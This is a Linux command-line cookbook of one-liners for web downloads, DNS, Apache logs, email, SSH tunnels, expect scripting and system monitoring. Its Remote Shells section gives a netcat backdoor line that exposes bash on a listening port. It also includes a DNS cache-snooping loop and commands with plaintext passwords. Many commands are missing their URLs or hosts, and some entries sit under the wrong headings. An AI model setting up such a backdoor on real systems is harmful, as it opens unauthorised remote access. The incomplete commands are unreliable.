access a page which is protected by basic authentication

 curl -u name:password

get the files a.html, b.html, c.html and save them with their names

 curl -O[a-c].html

get a.txt, r.txt and s.txt and save them in a file called dump.txt

 curl -o dump.txt{a,r,s}.txt

get all the pages of the linux cookbook pretending to be mozilla

 curl -A "Mozilla/4.0" -O[1-45].html
 for i in $(seq 1 45); do curl -A "Mozilla/4.0" -O$i.html; sleep 2; done  the same, but sleeping 2 seconds

download the linux cookbook, and convert to text at the same time

 for i in $(seq 1 45); do lynx --dump$i.html > cookbook-$i.txt; sleep 2; done

Mirroring ‹↑›

Create a mirror of a local folder, on a remote server

 rsync -e "/usr/bin/ssh -p22" -a --progress --stats --delete -l -z -v -r -p /root/files/ user@remote_server:/root/files/

Developing Software ‹↑›

Cpp ‹↑›

Add a newline to the end of a cpp file

 find . -iname "*.cpp" -exec perl -ni -e 'chomp; print "$_\n"' {} \;

Create etags file of .c, .cpp, and .h files in all subdirectories

 find . -regex ".*\.[cChH]\(pp\)?" -print | etags -

display typedefs, structs, unions and functions provided by a library

 cpp /usr/include/stdio.h | grep -v '^#' | grep -v '^$' | less
Display GCC Predefined Macros
 gcc -dM -E - <<<''

Show Shared Library Mappings

 ldconfig -p

Colorize make, gcc, and diff output

 colormake, colorgcc, colordiff

Write and run a quick C program

 cat | gcc -x c -o a.out - && ./a.out && rm a.out

make a patch file using an original file and a modification

 diff -u file.txt.orig file.txt > file.txt.patch
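A quick end-to-end sketch of the patch-making recipe above, using throwaway files (the file names and contents are invented for the example):

```shell
tmp=$(mktemp -d)
printf 'line one\nline two\n' > "$tmp/file.txt.orig"
printf 'line one\nline 2\n'   > "$tmp/file.txt"

# diff exits with status 1 when the files differ, so tolerate that
diff -u "$tmp/file.txt.orig" "$tmp/file.txt" > "$tmp/file.txt.patch" || true

# the patch records the removed and added lines
grep '^+line 2' "$tmp/file.txt.patch"
```

The resulting file.txt.patch can later be applied with 'patch -p0 < file.txt.patch'.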

compile an application

 ./configure; make && make install   use 'sudo' where necessary

Display a list of code committers sorted by the frequency of commits

 svn log -q|grep "|"|awk "{print \$3}"|sort|uniq -c|sort -nr

List all authors of a particular git project

 git log --format='%aN' | sort -u

Figure out your work output for the day

 git diff --stat `git log --author="XXXXX" --since="12 hours ago" --pretty=oneline | tail -n1 | cut -c1-40` HEAD

git diff of files that have been staged ie 'git add'ed

 git diff --cached

Remote Development ‹↑›

detach remote console for long running operations

 dtach -c /tmp/wires-mc mc

Execute a sudo command remotely, without displaying the password

 stty -echo; ssh HOSTNAME "sudo some_command"; stty echo

How to run a command on a list of remote servers read from a file

 dsh -M -c -f servers -- "command HERE"

connect to X login screen via vnc

 x11vnc -display :0 -auth $(ps -ef|awk '/xauth/ {print $15}'|head -1) -forever -bg &

Share your terminal session (remotely or whatever)

 screen -x

cvs, subversion

Use a Gmail virtual disk (GmailFS) on Ubuntu

 mount.gmailfs none /mount/path/ [-o username=USERNAME[,password=PASSWORD][,fsname=VOLUME]] [-p]

Ldap ‹↑›

LDAP search to query an ActiveDirectory server

 ldapsearch -LLL -H ldap:// -b 'dc=example,dc=com' -D 'DOMAIN\Joe.Bloggs' -w 'p@ssw0rd' '(sAMAccountName=joe.bloggs)'

decoding Active Directory date format

 ldapsearch -v -H ldap://<server> -x -D cn=<johndoe>,cn=<users>,dc=<ourdomain>,dc=<tld> -w<secret> -b ou=<lazystaff>,dc=<ourdomain>,dc=<tld> -s sub sAMAccountName=* '*' | perl -pne 's/(\d{11})\d{7}/"DATE-AD(".scalar(localtime($1-11644473600)).")"/e'

Dns The Domain Name System ‹↑›

resolve hostname to IP or vice versa with less output

 resolveip -s

Determine what version of bind is running on a dns server.

 dig -t txt -c chaos VERSION.BIND @<>

flush cached dns lookups

 ipconfig /flushdns   note: this is the Windows command

Check version of DNS Server

 nslookup -q=txt -class=CHAOS version.bind NS.PHX5.NEARLYFREESPEECH.NET

gets the bare ip(s) of a domain

 dig | sed -nr 's/^[^;].*?\s([.0-9]{7,15})$/\1/ p'

Get MX records for a domain

 host -t mx

Reverse DNS lookups

 sed 's/\([0-9]*\)\.\([0-9]*\)\.\([0-9]*\)\.\([0-9]*\) domain name pointer\(.*\)\./\4.\3.\2.\1\5/' lookups.txt

DNS cache snooping

 for i in `cat names.txt`; do host -r $i [nameserver]; done

Check if a .no domain is available

 check_dns_no() { for i in $* ; do if `wget -O - -q$ | grep "no match" &>/dev/null` ; then echo $ "available" ; fi ; sleep 1 ;done }

Get your public ip using dyndns

 curl -s | grep -o "[[:digit:].]\+"

Get fully qualified domain names (FQDNs) for IP address with

 NAME=$(nslookup $IP | sed -n 's/.*arpa.*name = \(.*\)/\1/p'); test -z "$NAME" && NAME="NO_NAME"; echo "$NAME"

Get your external IP address if your machine has a DNS entry

 host $HOSTNAME|cut -d' ' -f4

Perform a reverse DNS lookup

 dig -x

Get your public ip using dyndns

 curl -s ''

Check reverse DNS

 dig -x {IP}

Check reverse DNS

 dig +short -x {ip}

Update your OpenDNS network ip

 wget -q --user=<username> --password=<password> ' myip=your_ip' -O -

Update with your external IP.

 curl -v -k -u user:password "<your_domain_name_here> &myip=$(curl -s | sed 's/[a-zA-Z<>/ :]//g')&wildcard=NOCHG&mx=NOCHG&backmx=NOCHG"

Check reverse DNS

 host {checkIp or hostname} [dns server]

Get MX records for a domain

 dig mx +short

Short and sweet output from dig(1)

 alias ds='dig +noauthority +noadditional +noqr +nostats +noidentify +nocmd +noquestion +nocomments'

Get your external IP address if your machine has a DNS entry

 dig +short $HOSTNAME

List of reverse DNS records for a subnet

 nmap -R -sL | awk '{if($3=="not")print"("$2") no PTR";else print$3" is "$2}' | grep '('

rsync options used in the mirroring recipe above
-v verbose output
-a the "archive" mode, which means the same as "-rlptgoD"
-r recurse into directories
-l copy symbolic links as symbolic links
-p preserve file permissions
-t preserve file timestamps

Reading Usenet News ‹↑›

read news using the server '' (for example)

 slrn -h

Web Servers ‹↑›

set an HTTP redirect to listen on port 80

 while [ 0 ]; do echo -e "HTTP/1.1 302 Found\nLocation:" | nc -vvvv -l -p 80; done

Apache ‹↑›

Simple list of apache2 virtualhosts

 /usr/sbin/apache2ctl -S

Count how many times a certain referer appears in your apache log

 Q="reddit|digg"; F=*.log; awk -F\" '{print $4}' $F | egrep $Q | wc -l

Search for specific IPs taken from a text file within the apache

 grep -E ":(`cat bnd-ips.txt | sed 's/\./\\./g' | tr '\n' '|'`)" access.log

benchmark web server with apache benchmarking tool

 ab -n 9000 -c 900 localhost:8080/index.php

Analyse compressed Apache access logs for the most commonly

 zcat access_log.*.gz | awk '{print $7}' | sort | uniq -c | sort -n | tail -n 20

Who has the most Apache connections.

 netstat -anl | grep :80 | awk '{print $5}' | cut -d ":" -f 1 | uniq -c | sort -n | grep -c IPHERE

Summarize Apache Extended server-status to show longest running

 links --dump 1 http://localhost/server-status|grep ^[0-9]|awk 'BEGIN {print "Seconds, PID, State, IP, Domain, TYPE, URL\n--"} $4 !~ /[GCRK_.]/ {print $6, $2, $4, $11, $12, $13 " " $14|"sort -n"}'

grep apache access.log and list IP's by hits and date - sorted

 grep Mar/2009 /var/log/apache2/access.log | awk '{ print $1 }' | sort -n | uniq -c | sort -rn | head

show Apache memory usage

 ps auxf | grep httpd | grep -v grep | grep -v defunct | awk '{sum=sum+$6}; END {print sum/1024}'

How much RAM is Apache using?

 ps -o rss -C httpd | tail -n +2 | (sed 's/^/x+=/'; echo x) | bc
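The column-summing idiom used by the two memory recipes above can be tried on synthetic values without a running apache (the two RSS figures, in kilobytes, are invented for the example):

```shell
# sum two fake RSS values (KB) and print the total in MB, as the recipes do
printf '10240\n20480\n' | awk '{sum=sum+$1}; END {print sum/1024}'
```

This prints 30, i.e. 30MB for the two hypothetical processes.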

Know which modules are loaded on an Apache server

 apache2 -t -D DUMP_MODULES

Get list of all Apache Virtual Host and which is default for each

 httpd -S

web-serve files in the current folder tree accessible at http://$HOSTNAME:8000/

 python -m SimpleHTTPServer this is the simplest webserver setup

Top 10 requestors arranged by IP address from Apache/NCSA Logs

 awk '{print $1}' /var/log/httpd/access_log | sort | uniq -c | sort -rnk1 | head -n 10
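The counting pipeline above can be tested against a small hand-made log (the IP addresses and requests are invented; only the first field matters to the pipeline):

```shell
# build a three-line fake access log, then count requests per IP
tmp=$(mktemp -d)
cat > "$tmp/access_log" <<'EOF'
10.0.0.1 - - [10/Mar/2012:10:00:00] "GET / HTTP/1.1" 200 512
10.0.0.2 - - [10/Mar/2012:10:00:01] "GET /a HTTP/1.1" 200 512
10.0.0.1 - - [10/Mar/2012:10:00:02] "GET /b HTTP/1.1" 200 512
EOF
awk '{print $1}' "$tmp/access_log" | sort | uniq -c | sort -rnk1 | head -n 10
```

10.0.0.1 appears first with a count of 2, showing the heaviest requestor at the top.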

Www The World Wide Web ‹↑›

view the urls in the file 'eg.txt'

 wget -Oeg.txt; urlview eg.txt

convert an html file into valid xml

 tidy -asxhtml -numeric < index.html > index.xml

rapidshare download script in 200 characters

 u=`curl -d 'dl.start=Free' $(curl $1|perl -wpi -e 's/^.*"(http:\/\/rs.*)" method.*$/$1/'|egrep '^http'|head -n1)|grep "Level(3) \#2"|perl -wpi -e 's/^.*(http:\/\/rs[^\\\\]*).*$/$1/'`;sleep 60;wget $u

Check your unread Gmail from the command line

 curl -u username:password --silent "" | tr -d '\n' | awk -F '<entry>' '{for (i=2; i<=NF; i++) {print $i}}' | sed -n "s/<title>\(.*\)<\/title.*name>\(.*\)<\/name>.*/\2 - \1/p"

Twitpic upload and Tweet

 curl --form username=from_twitter --form password=from_twitter --form media=@/path/to/image --form-string "message=tweet"

check site ssl certificate dates

 echo | openssl s_client -connect 2>/dev/null |openssl x509 -dates -noout

Parallel file downloading with wget

 wget -nv -O- | egrep -o "http://[^[:space:]]*.jpg" | xargs -P 10 -r -n 1 wget -nv

Search Google from the command line

 curl -A Mozilla |html2text -width 80

Log your internet download speed

 echo $(date +%s) > start-time; URL=; while true; do echo $(curl -L --w %{speed_download} -o/dev/null -s $URL) >> bps; sleep 10; done &

Check if a domain is available and get the answer in just one

 whois | grep match

count the appearance of a word or a string in a given webpage

 wget -q -O- PAGE_URL | grep -o 'WORD_OR_STRING' | wc -w

Creating shortened URLs from the command line

 curl -s<website.url>/ | sed -n 's/.*\(http:\/\/\/[a-z0-9][a-z0-9]*\).*/\1/p' | uniq

Manually Pause/Unpause Firefox Process with POSIX-Signals

 killall -STOP -m firefox

Extract all urls from the last firefox sessionstore.js file used.

 sed -e 's/{"url":/\n&/g' ~/.mozilla/firefox/*/sessionstore.js | cut -d\" -f4
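The sed-and-cut extraction above can be exercised on a stand-in sessionstore file (the JSON fragment and URLs below are made up; a real sessionstore.js is much larger but has the same {"url": markers):

```shell
# a tiny fake sessionstore.js with two saved tabs
tmp=$(mktemp)
printf '[{"url":"http://example.com/a"},{"url":"http://example.org/b"}]' > "$tmp"

# break the line before each {"url": marker, then take the 4th "-delimited field
sed -e 's/{"url":/\n&/g' "$tmp" | cut -d\" -f4
```

The two URLs come out one per line (plus a blank line for the leading fragment).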

Downloading From The Web ‹↑›

news reading programs
slrn in active development
alpine a mail and news program
mutt another mail and news program

Run remote web page, but don't save the results

 wget -O /dev/null

Comic Strips Online ‹↑›

View the newest xkcd comic.

 wget `lynx --dump|grep png`

display the 'dilbert' comic strip of the day

 display$(curl -s|grep -Po '"\K/dyn/str_strip(/0+){4}/.*strip.[^\.]*\.gif')

who is surfing my web server?

 watch lsof -i :80

Css Cascading Style Sheets ‹↑›

Awk one-liner that sorts a css file by selector

 awk '/.*{$/{s[$1]=z[$1]=j+0}{l[j++]=$0}END{asorti(s);for(v in s){while(l[z[s[v]]]!~/}$/)print l[z[s[v]]++];print"}"ORS}}'

Twitter ‹↑›

The Twitter microblogging website has become strangely popular.

Update twitter from command line without reveal your password

 curl -n -d status='Hello from cli'

Get your Tweets from the command line

 curl -s -u user:password '' | xmlstarlet sel -t -m '//status' -v 'user/screen_name' -o ': ' -v 'text' -n

Print trending topics on Twitter

 wget -O - --quiet | ruby -rubygems -e 'require "json";require "yaml"; puts YAML.dump(JSON.parse($stdin.gets))'

check if it is possible to connect to twitter

 wget -q -O -

another tweet function to view statuses

 tweet () { curl -u UserName -d status="$*"; }

speak the last 3 tweets on mac os

 curl -s -u user:password | grep title | sed -ne 's/<\/*title>//gp' | head -n 4 | say -v Bruce

send tweets to twitter (and get user details)

 curl --basic --user "user:pass" --data-ascii "status=tweeting%20from%20%the%20linux%20command%20line"

Update twitter via curl

 curl -u user:pass -d status="Tweeting from the shell"

Print trending topics on Twitter

 curl -s | awk -F'</?[^>]+>' '/\/intra\/trend\//{print $2}'

Print trending topics on Twitter

 curl --silent | sed -n '/div id=\"hot\"/,/div/p' | awk -F\> '{print $2}' | awk -F\< '{print $1}' | sed '/^$/d'

Firefox ‹↑›

The firefox browser is an important piece of software.

how to run firefox in safe mode from command line

 firefox --safe-mode

run the firefox profile manager (which manages default settings)

 firefox -no-remote -P

view what percentage of memory firefox is using

 ps -o %mem= -C firefox-bin | sed -s 's/\..*/%/'

Extract all urls from last firefox sessionstore

 perl -lne 'print for /url":"\K[^"]+/g' $(ls -t ~/.mozilla/firefox/*/sessionstore.js | sed q)

release firefox from a still running message

 rm ~/.mozilla/firefox/<profile_dir>/.parentlock

List recorded form fields of Firefox (this recipe appears incomplete)

 cd ~/.mozilla/firefox/ && sqlite3 $(cat profiles.ini | grep Path )

Cleanup firefox's database.

 find ~/Library/Application\ Support/Firefox/ -type f -name "*.sqlite" -exec sqlite3 {} VACUUM \;

Speed up launch of firefox

 find ~ -name '*.sqlite' -exec sqlite3 '{}' 'VACUUM;' \;

Graphical Web Browsers ‹↑›

web mirroring
httrack - more interactive than wget

Text Mode Web Surfing ‹↑›

Text-mode web surfing means using a program running from a 'console' 'terminal' or 'command-line' to view web-pages. This generally means that it is not possible to view the images contained in the web-pages, only the text. While this is aesthetically inferior, it is faster and sometimes more useful and less distracting.

some graphical browsers
galeon - a small browser for gnome
iceweasel - debian firefox
abrowser - unbranded firefox
dillo - a very small browser

a text mode browser with table support

 links  press <f9> to open a menu of options

create a lynx macro by recording a session

 lynx -cmd_log logfilename

the '-cmd_log' switch should go after a starting page

 lynx -cmd_log logfile    this works
 lynx -cmd_log logfile    doesn't work!

replay a macro recorded with the -cmd_log switch

 lynx -cmd_script=/path/to/logfilename

make lynx accept all cookies (also settable in the configuration file)

 lynx -accept_all_cookies

w3m can display tables and with "w3m-img" images


output only text, with underscores, of the previous URL, and save it to the file 'winter_dreams', type (all on one line):

 lynx -dump -nolist -underscore > winter_dreams

print the pure text, with underscores, of the previous URL in a Times Roman font, type (all on one line):

 lynx -dump -nolist -underscore | enscript -B

view the 'new york times' archive with user-name and password 'cypherpunks'

 lynx -auth=cypherpunks:cypherpunks

save the URL as an annotated text file, 'mynews'

 lynx -dump -number_links -auth=cypherpunks:cypherpunks > mynews

If you want a lynx macro to go to a webpage through a password form, don't press 'q' to quit at the end of the recording, or else the quit will be included in the macro. Quit lynx with control-c instead.


Email Electronic Mail ‹↑›

Sort a one-per-line list of email address, weeding out duplicates

 sed 's/[ \t]*$//' < emails.txt | tr 'A-Z' 'a-z' | sort | uniq > emails_sorted.txt

extract email addresses from some file (or any other pattern)

 grep -Eio '([[:alnum:]_.-]+@[[:alnum:]_.-]+?\.[[:alpha:].]{2,6})'

Connect to SMTP server using STARTTLS

 openssl s_client -starttls smtp -crlf -connect

Email HTML content

 mailx -s "HTML Hello" -a "Content-Type: text/html" < body.htm

Block the 6700 worst spamhosts

 wget -q -O - | grep ^127 >> /etc/hosts

Alpine ‹↑›

Alpine is a 'console' based (curses) email client, allegedly used by Linus Torvalds. It uses the pico text editor to edit mail.

Mutt ‹↑›

the official site.
Mutt is apparently in active development (Mutt 1.5.20 was released on June 14, 2009). Mutt uses an external text editor to edit mail.

Send email with one or more binary attachments

 echo "Body goes here" | mutt -s "A subject" -a /path/to/file.tar.gz

Create mails array from .mutt-alias file.

 muttlst(){ for i in $*;do mails+=($(grep -wi "$i" .mutt-alias|awk '{print $NF}'));done;}

Webmail ‹↑›

Check your unread Gmail from the command line

 curl -u username --silent "" | perl -ne 'print "\t" if /<name>/; print "$2\n" if /<(title|name)>(.*)<\/\1>/;'

Attachments ‹↑›

Decode a MIME message

 munpack file.txt

Send a local file via email

 echo "see attached file" | mail -a filename -s "subject" email@address

Send a binary file as an attachment to an email

 uuencode archive.tar.gz archive.tar.gz | mail -s "Emailing: archive.tar.gz"

Send a local file as an attachment via email

 mutt -s "Message Subject Here" -a attachment.jpg </dev/null

Send a local file via email

 mpack -s "Backup: $file" "$file"

Email Addresses ‹↑›

extract email addresses from some file (or any other pattern)

 grep -Eio '([[:alnum:]_.]+@[[:alnum:]_]+?\.[[:alpha:].]{2,6})' file.html
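A slightly simplified variant of the pattern above (the non-greedy '?' dropped, since plain POSIX grep does not define it) can be tried on an inline string; the addresses are invented for the example:

```shell
# pull email-shaped tokens out of a line of text
printf 'contact alice@example.com or bob.smith@test.org today\n' |
  grep -Eio '[[:alnum:]_.-]+@[[:alnum:]_.-]+\.[[:alpha:].]{2,6}'
```

Each matched address is printed on its own line thanks to the -o option.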

Move all but the newest 100 emails to a gzipped archive

 find $MAILDIR/ -type f -printf '%T@ %p\n' | sort --reverse | sed -e '{ 1,100d; s/[0-9]*\.[0-9]* \(.*\)/\1/g }' | xargs -i sh -c "cat {}&&rm -f {}" | gzip -c >>ARCHIVE.gz
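A scaled-down sketch of the same keep-the-newest/archive-the-rest pipeline, keeping 2 files instead of 100 (the message files, names and dates are all invented; GNU find, sort, sed and xargs are assumed):

```shell
# five fake messages with increasing timestamps; m5 is the newest
tmp=$(mktemp -d)
arc=$(mktemp)
for i in 1 2 3 4 5; do
  echo "msg$i" > "$tmp/m$i"
  touch -d "2012-03-0$i" "$tmp/m$i"
done

# newest first; drop the 2 newest from the list; archive and delete the rest
find "$tmp" -type f -printf '%T@ %p\n' | sort --reverse \
  | sed -e '{ 1,2d; s/[0-9]*\.[0-9]* \(.*\)/\1/g }' \
  | xargs -i sh -c "cat {} && rm -f {}" | gzip -c >> "$arc"

zcat "$arc"    # the three oldest messages end up in the archive
```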

Smtp Protocol ‹↑›

python smtp server

 python -m smtpd -n -c DebuggingServer localhost:1025

Create AUTH PLAIN string to test SMTP AUTH session

 printf '\!:1\0\!:1\0\!:2' | mmencode | tr -d '\n' | sed 's/^/AUTH PLAIN /'
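Since mmencode (from the old metamail package) is often not installed, the same AUTH PLAIN string can be built with base64 from coreutils; the credentials 'user'/'secret' below are made up:

```shell
# AUTH PLAIN is base64("authzid\0authcid\0password")
printf '%s\0%s\0%s' user user secret | base64 | tr -d '\n' | sed 's/^/AUTH PLAIN /'
```

This prints 'AUTH PLAIN dXNlcgB1c2VyAHNlY3JldA==', which can be pasted into a test SMTP session.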

Older Mail Systems ‹↑›

send an email message to

 Subject: Hello
 Hi there, long time no talk! I'm just learning how to use ,,,

send an email message to user mrs on your local system

 mail mrs
 Subject: are you going to the party tonight?
 C-d
 ,,,

mail the contents of the text file 'trades' to the email address

 mail < trades

mail the text of the URL [28] as annotated text to the email address

 lynx -dump -number_links | mail

insert a copy of the current mail message into the body of the message you are writing, and then open the message in the default text editor ~f

output the location of your INBOX

 echo $MAIL
Usually, the INBOX location is in the '/var/spool/mail' directory, and has the same name as your username -- so if your username is mrs, your INBOX is '/var/spool/mail/mrs'.

see if you have mail

 Mail version 8.1 6/6/93.  Type ? for help.
 "/var/spool/mail/m": 3 messages 3 new
 ,,,

read the next unread message in mail

 &

read message number three in mail

 & 3

exit mail and revert your INBOX to its state before you started mail

 & x

delete the message you just read

 & d

delete message 3

 & d3

delete messages 10 through 14

 & d10-14

view the mail folder '~/email/mrs' in elm

 elm -f ~/email/mrs

view the contents of all of the email folders in your '~/email' directory

 cat ~/email/* > allmessages
 elm -f allmessages

turn biff on

 biff y    or put in .bashrc

see what biff is set to


see also xbiff,

see how many email messages you have waiting


count the number of email messages in the mail folder '~/email/saved'

 messages ~/email/saved

output a list showing sender names and subjects of your incoming mail


output a list with sender names and subjects in the file '~/email/saved'

 frm ~/email/saved

verify that the email address is valid


verify all of the email addresses contained in the file 'mail-list'

 vrfy -f mail-list

mail the JPEG file 'dream.jpeg' in the current directory to

metasend To: ,,,

view the current history log with lynx

 lynx ~/.browser-history/history-log.html

find URLs visited in the year 2000 titles containing the word 'Confessions'

 zgrep Confessions ~/.browser-history/history-log-2000*

open the URL in Mozilla from a shell script

 mozilla -remote 'openURL('

go back to the last URL you visited

  type [ALT] [<-],

forward to the next URL in your history,

  type [ALT] [->].

open your bookmarks file in a new window, type [ALT]-b.

archive the Web site at, only archiving the '/~mbt' directory, and writing log messages to a file called 'uk.log'

 wget -m -t3 -I /~mbt

add 'HEIGHT' and `WIDTH' parameters to the file `index.html',

 imgsizer index.html

peruse the file 'index.html' with its HTML tags removed

 unhtml index.html | less

remove the HTML tags from 'index.html' and put the output in 'index.txt'

 unhtml index.html > index.txt

print a copy of in typescript manuscript form

 lynx -dump -underscore -nolist | pr -d | enscript -B

print a PostScript copy of the document at the URL

 html2ps | lpr

write a copy of the document at the URL with all hypertext links underlined

 html2ps -u -o

validate the HTML in the file 'index.html'

 weblint index.html

connect to the system

 Trying ...
 Connected to kanga.INS.CWRU.Edu.

disconnect from a remote Linux system


temporarily return to a local shell prompt

 faraway-system$ C-[
 telnet> z

return to the remote system

 faraway-system$

In the first of the two preceding examples, the escape character is C-[.

make an anonymous ftp connection to

Connected to 220-Welcome to LEO.ORG.

change to the '/pub' directory on the remote system and look at the files there

 ftp> cd /pub
 250 Directory changed to /pub.

put a copy of the file 'thyme.rcp' from the current directory on the local system to the current directory of the remote system

 ftp> put thyme.rcp

change to the parent directory of the current directory on the local system

 ftp> lcd ..
 Local directory now /home/james/demos

download the file 'INDEX.gz' in the current directory on the remote system, saving it to your '~/tmp' directory

 ftp> lcd ~/tmp
 Local directory now /home/james/tmp

output a list of all newsgroups that match the pattern 'society'

 nngrep society
Use the '-u' option to search only through unsubscribed groups.

output a list of all unsubscribed-to newsgroups that match the pattern 'society'

 nngrep -u society
In the previous example, groups that you are already subscribed to are not listed.

The Ppp Protocol ‹↑›

start a PPP connection


stop a PPP session


Sending And Receiving Faxes ‹↑›

Debian: 'efax'

fax a copy of the file 'resume.txt' to the number `555-9099', using DTMF tone dialing

 efax -d /dev/modem -t T555-9099 resume.txt

fax all of the files with the '.fax' extension in the current directory to the number '555-9099', using DTMF tone dialing

 efax -d /dev/modem -t T555-9099 *.fax

fax all of the files listed in the file 'fax.list' to the number '555-9099', dialing `9' first to obtain an outside line, and using DTMF tone dialing

 efax -d /dev/modem -t T9,555-9099 $(cat fax.list)

set up efax to receive an incoming fax, saving the session log to a file, 'faxlog'

 efax -d /dev/modem -kZ -w -iS0=1 2>&1 >> faxlog
This command starts efax and sets up the modem to wait for an incoming fax.

automatically receive any incoming fax messages

efax: Wed Feb 24 08:38:52 1999 efax v 0.8a (Debian release 08a-6) Copyright 1996 Ed Casas

convert the file 'chart.pbm' for faxing

 efix -i pbm chart.pbm > chart.fax
This command converts a copy of the file 'chart.pbm' to the 'tiffg3' fax format, writing it to a file called 'chart.fax'. The original PBM file is not modified.

convert the PostScript file '' to fax format

 gs -q -sDEVICE=tiffg3 -dSAFER -dNOPAUSE -sOutputFile=resume.fax < /dev/null

convert '19990325.001', a received fax file, to a PostScript file

 efix -o ps 19990325.001 >

dial the number '368-2208'


Remote Shells ‹↑›

Create a backdoor on a machine to allow remote connection to bash

 /bin/bash | nc -l 1234   rather unwise...

Ssh ‹↑›

Script executes itself on another host with one ssh command

web browsers
lynx - the classic text mode browser debian: lynx, lynx-cur
elinks - displays utf8 menus, bad default colours
w3m - very strange key bindings, Japanese-oriented
links - doesn't seem to have utf8 support

connect via ssh using mac address

 sudo arp -s 00:35:cf:56:b2:2g temp && ssh root@

ssh and attach to a screen in one line.

 ssh -t user@host screen -x <screen name>

Forward port 8888 to remote machine for SOCKS Proxy

 ssh -D 8888

Copy ssh keys to user@host to enable password-less ssh logins.

 ssh-copy-id user@host

Attach screen over ssh

 ssh -t remote_host screen -r

login to an ssh server as root ''

 alias s='ssh -l root'

Ssh Tunnels ‹↑›

start a tunnel from some machine's port 80 to your local port 2001

 ssh -N -L2001:localhost:80 somemachine

plink ssh connect

 plink lyu0@mysshserver -pw 123456

Transfer large files/directories with no overhead over ssh

 ssh user@host "cd targetdir; tar cfp - *" | dd of=file.tar

Create an SSH connection (reverse tunnel) through your firewall.

 ssh -R 2001:localhost:22 username@<remote server ip>

Ssh Keys ‹↑›

create an alias to logon to the sourceforge shell

 alias sfshell='ssh -t user, create'

Copy your SSH public key on a remote machine for passwordless access

 cat ~/.ssh/*.pub | ssh user@remote-system 'umask 077; cat >>.ssh/authorized_keys'

Remove invalid key from the known_hosts file for the IP address

 ssh-keygen -R `host hostname | cut -d " " -f 4`

Remove invalid host keys from ~/.ssh/known_hosts

 ssh-keygen -R \[localhost\]:8022

SSH connection through host in the middle

 ssh -t reachable_host ssh unreachable_host

ssh autocomplete on the known hosts

 complete -W "$(echo `cut -f 1 -d ' ' ~/.ssh/known_hosts | sed -e s/,.*//g | uniq | grep -v "\["`;)" ssh
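The word-list part of the completion above (cut, sed, uniq, grep) can be checked against a hand-made known_hosts file; the host names and truncated keys below are invented:

```shell
# a fake ~/.ssh/known_hosts with two plain hosts and one bracketed entry
tmp=$(mktemp)
cat > "$tmp" <<'EOF'
server1,10.0.0.1 ssh-rsa AAAAB3Nza...
server2 ssh-rsa AAAAB3Nza...
[localhost]:8022 ssh-rsa AAAAB3Nza...
EOF

# first field, drop the ,ip aliases, drop [host]:port entries
cut -f 1 -d ' ' "$tmp" | sed -e s/,.*//g | uniq | grep -v "\["
```

Only server1 and server2 survive, which is exactly the word list handed to 'complete -W'.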

find the difference between two nodes

 diff <(ssh nx915000 "rpm -qa") <(ssh nx915001 "rpm -qa")

Copy something to multiple SSH hosts with a Bash loop

 for h in host1 host2 host3 host4 ; { scp file user@$h:/path/; }

Setup a persistant SSH tunnel w/ pre-shared key authentication

 autossh -f -i /path/to/key -ND local-IP:PORT User@Server

live ssh network throughput test

 pv /dev/zero|ssh $host 'cat > /dev/null'

setup a tunnel from destination machine port 80 to localhost 2001,

 ssh -N -L2001:localhost:80 -o "ProxyCommand ssh someuser@hubmachine nc -w 5 %h %p" someuser@destinationmachine

Enter your ssh password one last time

 cat .ssh/ | ssh "[ -d .ssh ] || mkdir .ssh ; cat >> .ssh/authorized_keys"

open a separate konsole tab and ssh to each of N servers

 for i in $(cat listofservers.txt); do konsole --new-tab -e ssh $i; done

browse files on an ssh server


Expect ‹↑›

Expect is a useful tool for scripting tasks which would normally require some user interaction. Expect includes its own simple scripting language and is available on the majority of unix-type operating systems, including Mac OS X.

Entire books exist about Expect, which is an extension to the 'tcl' language.

The command for the 'script executes itself on another host' recipe above:

 [ $1 == "client" ] && hostname || cat $0 | ssh $1 /bin/sh -s client

set the variable 'x' to the value 30

 set x 30

make a script timeout after 20 seconds

 set timeout 20

The above is useful when interacting with servers which may not respond.

start the 'ssh' program from within an expect script

 spawn ssh

wait for the program spawn to say exactly "hello!"

 expect "hello!"

wait for the program spawned to say anything with boggle in it

 expect "*boggle*"

send the response "yes" to the spawned program

 send "yes\n"
 send "yes\r"     more or less the same
 send yes\r       also possible, but not always

escape a '-' character in a send command

 send "/-4.5\n"

If we just wrote 'send "-4.5\n"' then expect would think that -4.5 was a flag and would fail.

a simple expect script

    set timeout 20
    set name [lindex $argv 0]
    set user [lindex $argv 1]
    set password [lindex $argv 2]
    spawn telnet $name
    expect "login:"
    send "$user\r"
    expect "Password:"
    send "$password\r"
    interact  ;# hands interaction over to the user

The Shell ‹↑›

set command line editing in the 'vi' mode

 set -o vi      gives "vi" like command line editing keystrokes
 set -o emacs   return to the default mode

Ram Memory ‹↑›

View memory utilisation

 sar -r

show the total amount of swap, in bytes

 free -b | grep "Swap:" | sed 's/ * / /g' | cut -d ' ' -f2
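
The 'sed' step collapses every run of spaces into a single space so that 'cut' can split on a single-space delimiter; a demonstration on a made-up line of 'free -b' output:

```shell
# squeeze runs of spaces down to one space, then take the second field
echo "Swap:   2097148   0   2097148" | sed 's/ * / /g' | cut -d ' ' -f2
# prints 2097148
```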

show the kernel 'swappiness' value (how aggressively the kernel swaps memory out to disk).

 sysctl -a | grep vm.swappiness

Monitor memory usage

 watch vmstat -sSM

Virtual Memory ‹↑›

Add temporary swap space

 dd if=/dev/zero of=/swapfile bs=1M count=64; chmod 600 /swapfile; mkswap /swapfile; swapon /swapfile

Clean swap area after using a memory hogging application

 swapoff -a ; swapon -a

vmstat/iostat with timestamp

 vmstat 1 | awk '{now=strftime("%Y-%m-%d %T "); print now $0}'

Disks ‹↑›

check free disk space and display sizes in an easy to read format

 df -h

show file and directory sizes for the current directory

 du -sh *

Hard Disk Partitions ‹↑›

list all hd partitions

 awk '/d.[0-9]/{print $4}' /proc/partitions

show disk partitions and sizes

 sudo fdisk -l

gparted: to repartition a disk

Serial Connections ‹↑›

Test a serial connection

 host A:  cat /dev/ttyS0
 host B:  echo hello > /dev/ttyS0

The Network ‹↑›

Network Information


restart network manager

 sudo /etc/init.d/networking restart

Console-based network interface monitor

 ethstatus -i eth0

Display ncurses based network monitor

 nload -u m eth0

Show apps that use internet connection at the moment.

 netstat -lantp | grep -i stab | awk -F/ '{print $2}' | sort | uniq

Monitor RX/TX packets and any subsequent errors

 watch 'netstat -aniv'

Simplest way to get a list of open ports

 netstat -lnp

ethtool summary of eth# devices

 for M in 0 1 2 3 ; do echo eth$M ;/sbin/ethtool eth$M | grep -E "Link|Speed" ; done

Check the status of a network interface

 mii-tool [if]

find all active IP addresses in a network

 arp-scan -l

